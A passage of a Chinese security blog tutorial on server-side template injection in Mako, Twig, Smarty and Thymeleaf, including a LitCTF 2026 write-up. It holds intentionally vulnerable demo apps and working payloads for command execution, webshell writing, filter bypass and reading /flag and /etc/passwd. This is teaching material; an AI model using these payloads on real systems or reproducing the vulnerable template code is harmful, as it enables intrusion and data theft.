【核心漏洞点】：动态解析用户输入的文本作为模板</span><br>                mako_template = Template(user_input)<br>                result = mako_template.render()<br>            <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>                result = <span class="hljs-string">f&quot;&lt;span style=&#x27;color:red;&#x27;&gt;Mako 渲染报错: <span class="hljs-subst">&#123;<span class="hljs-built_in">str</span>(e)&#125;</span>&lt;/span&gt;&quot;</span><br>                <br>    <span class="hljs-keyword">return</span> render_template_string(HTML_TEMPLATE, result=result)<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[+] Mako SSTI 测试环境已启动: http://127.0.0.1:5000&quot;</span>)<br>    app.run(host=<span class="hljs-string">&#x27;127.0.0.1&#x27;</span>, port=<span class="hljs-number">5000</span>, debug=<span class="hljs-literal">True</span>)<br></code></pre></td></tr></table></figure>

<h4 id="代码执行"><a href="#代码执行" class="headerlink" title="代码执行"></a>代码执行</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">$&#123;<span class="hljs-built_in">__import__</span>(<span class="hljs-string">&#x27;os&#x27;</span>).popen(<span class="hljs-string">&#x27;whoami&#x27;</span>).read()&#125;<br></code></pre></td></tr></table></figure>

<h4 id="Bypass"><a href="#Bypass" class="headerlink" title="Bypass"></a>Bypass</h4><p>如果<code>$&#123;&#125;</code>标识符被过滤，我们可以利用&lt;%%&gt;执行python代码，需要利用<code>context.write()</code>实现回显</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">&lt;% context.write(<span class="hljs-built_in">__import__</span>(<span class="hljs-string">&#x27;os&#x27;</span>).popen(<span class="hljs-string">&#x27;whoami&#x27;</span>).read()) %&gt;<br></code></pre></td></tr></table></figure>

<p>还可以利用控制结构实现盲注</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">% <span class="hljs-keyword">if</span> <span class="hljs-built_in">getattr</span>(<span class="hljs-built_in">getattr</span>(<span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;/&quot;</span>+<span class="hljs-string">&quot;f&quot;</span>+<span class="hljs-string">&quot;l&quot;</span>+<span class="hljs-string">&quot;a&quot;</span>+<span class="hljs-string">&quot;g&quot;</span>), <span class="hljs-string">&#x27;read&#x27;</span>)(), <span class="hljs-string">&#x27;__getitem__&#x27;</span>)(<span class="hljs-number">0</span>) <span class="hljs-keyword">in</span> <span class="hljs-string">&#x27;f&#x27;</span>:<br>True_Flag<br>% endif<br></code></pre></td></tr></table></figure>

<h3 id="应用-1"><a href="#应用-1" class="headerlink" title="应用"></a>应用</h3><h4 id="LitCTF2026-lit-ezssti"><a href="#LitCTF2026-lit-ezssti" class="headerlink" title="[LitCTF2026]lit_ezssti"></a>[LitCTF2026]lit_ezssti</h4><p>Wappalyzer 插件显示编程语言为 Python，先输入：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;&#123;<span class="hljs-number">7</span>*<span class="hljs-number">7</span>&#125;&#125;<br></code></pre></td></tr></table></figure>

<p>原样回显，再输入：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">$&#123;<span class="hljs-number">7</span>*<span class="hljs-number">7</span>&#125;<br></code></pre></td></tr></table></figure>

<p>回显 <code>WAF</code>，说明应该是猜对了，后端模板引擎是 Mako，但是过滤了 <code>$</code>，可以用 Mako 代码块 <code>&lt;% ... %&gt;</code> 替代，输入：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">&lt;% context.write(<span class="hljs-built_in">__import__</span>(<span class="hljs-string">&#x27;os&#x27;</span>).popen(<span class="hljs-string">&#x27;cat /flag&#x27;</span>).read()) %&gt;<br></code></pre></td></tr></table></figure>

<p>又回显 <code>WAF</code>，测试一下是过滤了 <code>.</code> 和 <code>flag</code>，把所有的 <code>.</code> 替换成 <code>getattr()</code>，<code>flag</code> 换成 <code>fla*</code>，输入：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">&lt;%<span class="hljs-built_in">getattr</span>(context,<span class="hljs-string">&#x27;write&#x27;</span>)(<span class="hljs-built_in">getattr</span>(<span class="hljs-built_in">getattr</span>(<span class="hljs-built_in">__import__</span>(<span class="hljs-string">&#x27;os&#x27;</span>),<span class="hljs-string">&#x27;popen&#x27;</span>)(<span class="hljs-string">&#x27;cat /fla*&#x27;</span>),<span class="hljs-string">&#x27;read&#x27;</span>)())%&gt;<br></code></pre></td></tr></table></figure>

<p>（本题wp摘自<a target="_blank" rel="noopener" href="https://blog.yanxisishi.top/2026/litctf_2026">LitCTF 2026 WEB方向全WP | 康可ing</a>）</p>
<p>构造盲注也可以</p>
<h1 id="PHP模版引擎"><a href="#PHP模版引擎" class="headerlink" title="PHP模版引擎"></a>PHP模版引擎</h1><h2 id="Twig"><a href="#Twig" class="headerlink" title="Twig"></a>Twig</h2><h3 id="特性-2"><a href="#特性-2" class="headerlink" title="特性"></a>特性</h3><ul>
<li><strong>使用统一的属性&#x2F;方法访问语法</strong>：使用点号 <code>.</code> 可以动态访问数组的键、对象的属性，或者调用对象的方法</li>
<li><strong>支持求值与变量替换</strong>：使用双大括号 <code>&#123;&#123; var &#125;&#125;</code>。</li>
<li><strong>支持标签控制结构</strong>：使用 <code>&#123;% %&#125;</code> 标志，专门用于编写逻辑控制。</li>
<li><strong>采用严格的默认安全隔离环境</strong>：模板运行在专门的沙箱机制中，默认完全禁止直接调用原生的 PHP 危险函数（如 <code>system()</code>、<code>eval()</code>）。发生 SSTI 风险时，通常需要依赖特定版本下暴露的内置魔术对象（如 <code>_self.env</code>）或特定的高级过滤器（如 <code>filter</code>、<code>map</code>）作为跳板来间接执行代码。</li>
</ul>
<h3 id="用法-1"><a href="#用法-1" class="headerlink" title="用法"></a>用法</h3><h4 id="使用过滤器实现RCE"><a href="#使用过滤器实现RCE" class="headerlink" title="使用过滤器实现RCE"></a>使用过滤器实现RCE</h4><p>新版 Twig（v3.x）删除了 <code>_self</code> 对象，但如果开发者在配置 Twig 时允许了一些特定对象传入，或者在某些特定场景下，利用 Twig 自身的循环&#x2F;数组过滤器依然可以实现 RCE。</p>
<p>Twig 的 <code>filter</code> 允许传入一个回调函数来过滤数组。如果我们将数组元素设为命令，回调函数设为 <code>system</code>，就能直接触发：</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123; <span class="hljs-name">[&quot;whoami&quot;]</span> | filter(<span class="hljs-name">&quot;system&quot;</span>) &#125;&#125;</span><br></code></pre></td></tr></table></figure>

<p><code>map</code>原理与 <code>filter</code> 类似，使用 <code>map</code> 对数组中的每个元素执行指定的 PHP 函数：</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123; <span class="hljs-name">[&quot;id; uname -a&quot;]</span> | map(<span class="hljs-name">&quot;system&quot;</span>) &#125;&#125;</span><br></code></pre></td></tr></table></figure>

<p>利用数组减少（归纳）过滤器，同样可以传入回调函数：</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123; <span class="hljs-name">[&quot;whoami&quot;]</span> | reduce(<span class="hljs-name">&quot;system&quot;</span>) &#125;&#125;</span><br></code></pre></td></tr></table></figure>

<h4 id="通杀Payload"><a href="#通杀Payload" class="headerlink" title="通杀Payload"></a>通杀Payload</h4><figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">[&quot;id&quot;]</span>|map(<span class="hljs-name">&quot;system&quot;</span>)|join(<span class="hljs-name">&quot;,&quot;</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">[&quot;id&quot;, 0]</span>|sort(<span class="hljs-name">&quot;system&quot;</span>)|join(<span class="hljs-name">&quot;,&quot;</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">[&quot;id&quot;]</span>|filter(<span class="hljs-name">&quot;system&quot;</span>)|join(<span class="hljs-name">&quot;,&quot;</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">[0, 0]</span>|reduce(<span class="hljs-name">&quot;system&quot;</span>, <span class="hljs-string">&quot;id&quot;</span>)|join(<span class="hljs-name">&quot;,&quot;</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;&#123;<span class="hljs-name">&quot;&lt;?php phpinfo();&quot;</span>:<span class="hljs-string">&quot;/var/www/html/shell.php&quot;</span>&#125;|map(<span class="hljs-name">&quot;file_put_contents&quot;</span>)&#125;&#125;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260701205357940.png" srcset="/img/loading.gif" lazyload alt="image-20260701205357940"></p>
<h2 id="Smarty"><a href="#Smarty" class="headerlink" title="Smarty"></a>Smarty</h2><h3 id="特性-3"><a href="#特性-3" class="headerlink" title="特性"></a>特性</h3><ul>
<li><strong>使用独树一帜的单大括号语法</strong>：默认使用单大括号 <code>&#123; var &#125;</code> 作为其标识符，点号 <code>.</code> 用于访问数组键值或对象的属性&#x2F;方法</li>
<li><strong>支持原生的 PHP 表达式与变量赋值</strong>：虽然它有自己的语法，但它允许在模板内直接声明和修改 PHP 变量（如 <code>&#123; assign var=&quot;name&quot; value=&quot;value&quot; &#125;</code>），甚至在未开启安全模式时，可以直接通过 <code>&#123; $cos = cos(0) &#125;</code> 这种形式调用 PHP 的原生内置函数。</li>
<li><strong>支持特殊的原生代码块和闭合控制标签</strong>：使用 <code>&#123; if &#125;...&#123; /if &#125;</code>、<code>&#123; foreach &#125;...&#123; /foreach &#125;</code> 来编写逻辑控制。更特殊的是，它为了兼容原生 PHP，甚至自带了专用的代码块标签，允许直接在模板里嵌入原生的 PHP 代码（如老版本中的 <code>&#123; php &#125; ... &#123; /php &#125;</code> 标签）。</li>
<li><strong>“开门大吉”的默认非沙箱环境（SSTI 的重灾区）</strong>：Smarty 在默认配置下<strong>几乎不提供任何沙箱隔离</strong>。这意味着一旦存在用户可控的 SSTI，攻击者不需要像 Twig 那样寻找复杂的子类链或特定的过滤器，直接利用其内置的特殊标签（如 <code>&#123; php &#125;</code>、<code>&#123; include_php &#125;</code>）或者直接调用 PHP 危险函数。</li>
</ul>
<h3 id="用法-2"><a href="#用法-2" class="headerlink" title="用法"></a>用法</h3><h4 id="直接RCE"><a href="#直接RCE" class="headerlink" title="直接RCE"></a>直接RCE</h4><p>由于Smarty3的默认非沙箱环境，RCE非常简单</p>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs clean">&#123;<span class="hljs-keyword">system</span>(<span class="hljs-string">&#x27;whoami&#x27;</span>)&#125;<br></code></pre></td></tr></table></figure>

<figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs isbl">&#123;<span class="hljs-function"><span class="hljs-title">passthru</span>(<span class="hljs-string">&#x27;id; uname -a&#x27;</span>)&#125;</span><br></code></pre></td></tr></table></figure>

<h4 id="PHP标签"><a href="#PHP标签" class="headerlink" title="PHP标签"></a>PHP标签</h4><p>在非常老的 Smarty v2 中，或者在 Smarty 3 中手动开启了允许原生 PHP 标签的环境下，可以直接这样写：</p>
<figure class="highlight dust"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dust"><span class="hljs-template-variable">&#123;php&#125;</span><span class="language-xml">system(&#x27;whoami&#x27;);</span><span class="hljs-template-tag">&#123;/<span class="hljs-name">php</span>&#125;</span><br></code></pre></td></tr></table></figure>

<h4 id="Smarty-v4-x-v5-x-严格模式绕过"><a href="#Smarty-v4-x-v5-x-严格模式绕过" class="headerlink" title="Smarty (v4.x &#x2F; v5.x) 严格模式绕过"></a>Smarty (v4.x &#x2F; v5.x) 严格模式绕过</h4><p>Smarty 4 或 Smarty 5 已经默认禁用了 <code>&#123;system()&#125;</code> 这种直接调用原生 PHP 函数的越权行为。但由于 Smarty 复杂的对象设计，依然可以通过其内置的静态类或内置方法实现完美绕过：</p>
<p>写webshell</p>
<figure class="highlight php-template"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php-template"><span class="language-xml">&#123;Smarty_Internal_Runtime_WriteFile::writeFile(&#x27;shell.php&#x27;, &#x27;</span><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-title function_ invoke__">phpinfo</span>(); <span class="hljs-meta">?&gt;</span></span><span class="language-xml">&#x27;, $smarty.template_object-&gt;smarty)&#125;</span><br></code></pre></td></tr></table></figure>

<p>读敏感文件</p>
<figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs abnf">&#123;fetch file<span class="hljs-operator">=</span><span class="hljs-string">&quot;/etc/passwd&quot;</span>&#125;<br></code></pre></td></tr></table></figure>

<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs rust">&#123;$smarty.template_object<span class="hljs-punctuation">-&gt;</span><span class="hljs-title function_ invoke__">getStreamVariable</span>(<span class="hljs-symbol">&#x27;file</span>:<span class="hljs-comment">///etc/passwd&#x27;)&#125;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260701213655875.png" srcset="/img/loading.gif" lazyload alt="image-20260701213655875"></p>
<h1 id="Java模板引擎"><a href="#Java模板引擎" class="headerlink" title="Java模板引擎"></a>Java模板引擎</h1><h2 id="Thymeleaf"><a href="#Thymeleaf" class="headerlink" title="Thymeleaf"></a>Thymeleaf</h2><h3 id="特性-4"><a href="#特性-4" class="headerlink" title="特性"></a>特性</h3><ul>
<li><strong>独创的“原型即模板”语法</strong>：它不破坏原生 HTML 的结构。它通过在 HTML 标签中添加特有的属性前缀（如 <code>th:text</code>、<code>th:value</code>）来嵌入动态逻辑。这意味着即使用浏览器直接双击打开 <code>.html</code> 源码，页面也能正常显示静态排版。</li>
<li><strong>基于表达式语言（EL）进行变量替换</strong>：使用 <code>$&#123; var &#125;</code> 标识符。其底层高度依赖 <strong>OGNL</strong>（标准 Java 环境）或 <strong>SpEL</strong>（Spring 环境）表达式语言。大括号内不仅能写变量，还可以直接编写复杂的 Java 代码（如对象实例化、方法调用）。</li>
<li><strong>支持多功能的片段表达式</strong>：使用 <code>~&#123; templateName :: fragmentName &#125;</code> 语法。它允许在一个 HTML 页面中动态引入另一个页面的某个片段（类似于组件化开发）。</li>
<li><strong>表面严格、实则依赖上下文的沙箱环境</strong>：Thymeleaf 自身有一套静态黑名单（禁止直接调用 <code>java.lang.Runtime</code> 等危险对象）。但在 Spring 环境中，由于它允许通过 <code>@beanName</code> 直接调用 Spring 容器中的任意公开 Bean（如 <code>@environment</code> 或各种辅助工具类），这使得安全测试人员常常能通过 Spring 的上下文生态轻松绕过其原生沙箱。</li>
</ul>
<h3 id="用法-3"><a href="#用法-3" class="headerlink" title="用法"></a>用法</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> com.roboterh.fastjsondemo.controller;<br><br><span class="hljs-keyword">import</span> org.springframework.stereotype.Controller;<br><span class="hljs-keyword">import</span> org.springframework.ui.Model;<br><span class="hljs-keyword">import</span> org.springframework.web.bind.annotation.GetMapping;<br><span class="hljs-keyword">import</span> org.springframework.web.bind.annotation.RequestParam;<br><br><span class="hljs-meta">@Controller</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">ThymeleafController</span> &#123;<br><br>    <span class="hljs-meta">@GetMapping(&quot;/&quot;)</span><br>    <span class="hljs-keyword">public</span> String <span class="hljs-title function_">index</span><span class="hljs-params">(Model model)</span> &#123;<br>        model.addAttribute(<span class="hljs-string">&quot;message&quot;</span>, <span class="hljs-string">&quot;world&quot;</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;hello&quot;</span>;<br>    &#125;<br>    <span class="hljs-meta">@GetMapping(&quot;/cmd&quot;)</span><br>    <span class="hljs-keyword">public</span> String <span class="hljs-title function_">eval</span><span class="hljs-params">(<span class="hljs-meta">@RequestParam</span> String cmd)</span> &#123;<br>        <span class="hljs-keyword">return</span> cmd;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<h4 id="读取任意文件"><a href="#读取任意文件" class="headerlink" title="读取任意文件"></a>读取任意文件</h4><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">__$&#123;new java<span class="hljs-selector-class">.io</span><span class="hljs-selector-class">.BufferedReader</span>(new java<span class="hljs-selector-class">.io</span><span class="hljs-selector-class">.FileReader</span>(<span class="hljs-string">&#x27;/flag&#x27;</span>))<span class="hljs-selector-class">.readLine</span>()&#125;__::<span class="hljs-attribute">x</span><br></code></pre></td></tr></table></figure>

<h4 id="远程命令执行（RCE）"><a href="#远程命令执行（RCE）" class="headerlink" title="远程命令执行（RCE）"></a>远程命令执行（RCE）</h4><p>如果你想执行系统命令（比如弹出计算器或反弹 Shell），可以利用 Java 的 <code>Runtime</code> 类：</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ruby"><span class="hljs-symbol">http:</span>/<span class="hljs-regexp">/localhost:8080/cmd</span>?cmd=__<span class="hljs-variable">$&#123;</span>T(java.lang.<span class="hljs-title class_">Runtime</span>).getRuntime().exec(<span class="hljs-string">&#x27;calc&#x27;</span>)&#125;<span class="hljs-symbol">__:</span><span class="hljs-symbol">:x</span><br></code></pre></td></tr></table></figure>

<h4 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h4><p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260701234155860.png" srcset="/img/loading.gif" lazyload alt="image-20260701234155860"></p>
<p>如果有文件上传漏洞的话，我们可以通过覆盖原路由读取的html文件来实现ssti</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">html</span>&gt;</span> <br><span class="hljs-tag">&lt;<span class="hljs-name">html</span> <span class="hljs-attr">lang</span>=<span class="hljs-string">&quot;en&quot;</span> <span class="hljs-attr">xmlns:th</span>=<span class="hljs-string">&quot;http://www.thymeleaf.org&quot;</span>&gt;</span> <br>    <span class="hljs-tag">&lt;<span class="hljs-name">head</span>&gt;</span>    <br>    <span class="hljs-tag">&lt;<span class="hljs-name">meta</span> <span class="hljs-attr">charset</span>=<span class="hljs-string">&quot;UTF-8&quot;</span>&gt;</span>    <br>        <span class="hljs-tag">&lt;<span class="hljs-name">title</span>&gt;</span>Test<span class="hljs-tag">&lt;/<span class="hljs-name">title</span>&gt;</span> <br>    <span class="hljs-tag">&lt;/<span class="hljs-name">head</span>&gt;</span> <span class="hljs-tag">&lt;<span class="hljs-name">body</span>&gt;</span>    <br>    <span class="hljs-tag">&lt;<span class="hljs-name">div</span> <span class="hljs-attr">th:fragment</span>=<span class="hljs-string">&quot;main&quot;</span>&gt;</span>        <br>        <span class="hljs-tag">&lt;<span class="hljs-name">span</span> <span class="hljs-attr">th:text</span>=<span class="hljs-string">&quot;&#x27;hello &#x27; + $&#123;message&#125;&quot;</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">span</span>&gt;</span>    <br>    <span class="hljs-tag">&lt;/<span class="hljs-name">div</span>&gt;</span> <br>    <span class="hljs-tag">&lt;/<span class="hljs-name">body</span>&gt;</span> <br><span class="hljs-tag">&lt;/<span class="hljs-name">html</span>&gt;</span><br></code></pre></td></tr></table></figure>



<h1 id="参考文献"><a href="#参考文献" class="headerlink" title="参考文献"></a>参考文献</h1><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/17718">Bottle框架的ssti、内存马、污染深入浅出-先知社区</a></p>
<p><a target="_blank" rel="noopener" href="https://jatopos.github.io/2025/10/05/Python%20Bottle%20SSTI%E6%B3%A8%E5%85%A5/">Python Bottle SSTI注入 | Jatopos的博客</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/i2u9/p/bottle-template.html">bottlepy template - Simple Love - 博客园</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/11633">Mako模板引擎以及沙箱机制-先知社区</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/7113">TWIG 全版本通用 SSTI payloads-先知社区</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/10556">Smarty 最新 SSTI 总结-先知社区</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/339962.html">完全搞懂Thymeleaf SSTI - FreeBuf网络安全行业门户</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>SSTI进阶——多种模版引擎特征及应用</div>
      <div>https://www.sunynov.top/2026/06/30/多种模版引擎特征及应用/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>suny</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年6月30日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/06/28/SDPCSEC%E7%BA%B3%E6%96%B0%E8%B5%9Bmisc%E9%83%A8%E5%88%86/" title="SDPCSEC纳新赛misc部分">
                        <span class="hidden-mobile">SDPCSEC纳新赛misc部分</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"sg2xM2g9UCt39D62pmfzcl8b-gzGzoHsz","appKey":"ludHhVlixZUIrJv11t6rmegp","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":true,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":true},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://icp.gov.moe/?keyword=20250279" target="_blank">萌ICP备20250279号</a> <br> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
